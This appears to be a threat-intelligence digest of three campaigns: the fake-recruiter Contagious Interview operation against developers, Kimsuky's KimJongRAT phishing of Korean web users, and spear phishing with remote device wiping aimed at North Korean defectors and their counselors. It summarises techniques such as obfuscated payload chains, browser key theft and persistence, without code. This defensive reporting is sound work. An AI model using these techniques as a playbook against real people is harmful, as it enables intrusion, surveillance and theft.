Time

·         Unknown

Target

·         Software developers (especially cryptocurrency and Web3 project developers)

Initial Access

·         Social engineering techniques using fake recruiter profiles on LinkedIn

·         ClickFix technique

– Transfer of malware code projects uploaded to GitLab and other platforms

·         Tasked with executing code based on Node.js as an interview assignment

Exploited Vulnerabilities

·         None

Malware and Tools

·         BeaverTail: Steals information such as system information, wallets, documents, and Keychain

·         OtterCookie: Information-stealing malware

·         InvisibleFerret: Python-based modular RAT

·         Tsunami Payload: Adds an exception to Defender, creates a scheduler, and downloads the next stage from Pastebin

·         Tsunami Injector: Installs a package and ensures persistence

·         Tsunami Infector: Automatically installs Python and escalates privileges if Python is not installed

·         TsunamiInstaller: Installing a malicious payload based on .NET

Techniques

·         Developer-targeted attack using social engineering

·         Exploiting legitimate JSON storage services such as JSON Keeper, JSONsilo, and npoint.io

·         Multi-layer JavaScript code obfuscation and payload loading

·         Mass embedding of Pastebin URLs and XOR+Base64 decoding chain

·         Integrity check through RSA signature verification

·         Force-installing Python environment and privilege escalation (UAC)

·         Downloading additional payloads via TOR

Damage

– Exfiltration of sensitive information such as system information, wallets, logs, environment variables, files, documents, PDFs, and screenshots

·         macOS Keychain Exfiltration

Description

·         Conducted the campaign Contagious Interview, which disguised the campaign as a developer job interview

·         Inserting malicious JavaScript code that is loaded from a JSON repository into the “Demo Project” provided by GitLab

·         Multi-stage attack chain configuration that leads to the BeaverTail → InvisibleFerret → Tsunami modules

· Loading of additional stage payload through a complex URL decoding chain based on Pastebin

– Utilizing legitimate infrastructures such as JSON storage services, code repositories, and Pastebin to bypass static detection and disguise themselves within normal traffic

Source

·         Contagious Interview Actors Now Utilize JSON Storage Services for Malware Delivery[1]

Time

·         September 2025

Targeted Victims

·         Account credentials of Korean Internet service users (Nate, Naver, Kakao) through phishing

Initial Access

·         Phishing emails impersonating public organizations (Ministry of Gender Equality and Family/National Tax Service)

·         Emails sent using PHPMailer

·         LNK file disguised as a PDF or TXT file

·         DOC file that prompts users to enable macros upon opening

·         Login phishing sites for Korean services such as Nate, Naver, and Kakao

·         Malicious ZIP files that are disguised as GitHub Releases

Exploited Vulnerabilities

·         None

Malware and Tools

·         KimJongRAT: Information-stealing malware

·         sys.dll: PE-based KimJongRAT module

·         user.txt/net64.log/app64.log/main64.log: Modules for data collection, master key extraction, and C2 communication

·         v3.hta/pipe.zip/pipe.log/v3.log: PE or PowerShell branch based on Defender status

·         PowerShell scripts (1.ps1, 1.log, 2.log): Collect system information, operate RAT, and perform keylogging

·         HTA-based payloads (doc.hta/pw.hta/kyc.hta): Download and disguised as password-protected documents

·         Google Drive, GitHub, URL Shortening Services (link24.kr / buly.kr): Hosting payloads

·         Phishing Infrastructure

Techniques

·         Disguised Social Engineering of Public Institutions

·         Distribution of payloads exploiting GitHub Releases

·         Using LNK File Disguised as TXT or PDF File

·         PDF Protected by Password → LNK Prompts for Execution

·         DOC Macro-based VBS → PowerShell → HTA Chain

·         Multi-layer encryption using Base64, RC4, AES, etc.

·         Anti-VM, integrity check, and detection evasion

·         Extraction of Chrome master key (bypassing AppBound Encryption)

·         Keylogging, clipboard theft, and file indexing

·         Ensuring persistence (Run registry and Task Scheduler)

·         Credential theft through proxy-based login phishing page

Damage

·         Theft of sensitive information such as web browser accounts, cookies, and passwords

·         Decryption of passwords and cookies through the stolen Chrome master key

– Exfiltration of system information, file lists, and program lists

· Collecting keylogging and clipboard information

– Theft of messenger (Telegram), FTP account, and cryptocurrency wallet data

·         Theft of credentials (Naver, Kakao, Nate, etc.)

Description

·         Operating KimJongRAT variants through two chains: PE and PowerShell

·         Abuse of legitimate services such as GitHub, Google Drive, and Korean URL shortening services

·         Impersonation, Credential, and Spear Phishing Targeting Public Institutions to Steal Victim’s Information and Browser Data

·         Insertion of the Chrome master key decryption module, leading to the evolution into a 2025 integrated attack flow of PE+PowerShell for the mass exfiltration of information

Source

·         Kimsuky’s Ongoing Evolution of KimJongRAT and Expanding Threats[2]

Time

·         September 2025

Target

·         Specialized counselor for North Korean defectors

·         North Korean Defectors

Initial Access

·         Impersonation of NTS and Other South Korean Agencies for Spear Phishing

·         Transmission of malicious ZIP, MSI, and LNK files

·         Hijacking KakaoTalk(A popular messaging app in South Korea) accounts and sending messages impersonating victims

·         Sending a file disguised as a stress relief program

Exploited Vulnerabilities

·         None

Malware and Tools

·         IoKlTr.au3: An AutoIt-based malicious script

·         Stress Clear.msi: A malicious MSI installer package 

·         install.bat/error.vbs: Scripts that execute malicious behaviors and display fake messages 

·         RemcosRAT: A remote control RAT 

·         LilithRAT: An AutoIt-based RAT 

·         QuasarRAT: C#-based RAT

·         RftRAT: Japanese C2 Connection-based RAT

·         autoit.vbs/install.bat: Used for secondary execution

·         C2 Infrastructure: WordPress-based server, multiple overseas IPs

Techniques

·         Distributing malicious files based on impersonating a KakaoTalk friend

·         Stealing and resetting Google Find Hub accounts remotely

·         Long-term stay and internal reconnaissance

·         Remotely monitoring through webcam and microphone

·         AutoIt-based file hiding and task scheduler registration

·         Abuse of digital signature in the name of a Chinese company

·         Script obfuscation (Base64, AES, HMAC, etc.)

·         Abuse of WordPress-based C2

·         Secondary attack propagation based on account hijacking

Damages

·         Remote initialization and data deletion on Android smartphones and tablets

·         Theft of personal identifiable information, sensitive information, webcam footage, and audio

·         Hijacking of Google and Naver accounts

·         Malicious File Distribution to Contacts After Compromising KakaoTalk Account

·         Continuous Monitoring and Execution of Additional Commands Through RAT Installation

Description

·         Targeting South Koreans, the threat actor executed a series of attacks in the following order: spear phishing, account takeover, Find Hub exploitation, remote device wipe, and distribution of malicious files via KakaoTalk.

·         The threat actor disguised an MSI-based malicious file as a “stress relief program” and used it as the primary infection vector.

·         After gaining access to a victim’s Google account, the threat actor used the Find Hub feature to query the GPS location and perform continuous remote wipes.

·         The threat actor exploited the victim’s KakaoTalk PC session to facilitate secondary infection spread.

·         A hybrid attack chain was identified, involving an AutoIt-based malicious script and multiple RATs (QuasarRAT, RemcosRAT).

Source

·         Tactic of remotely resetting Android devices that were used by a threat actor group with state sponsorship [3]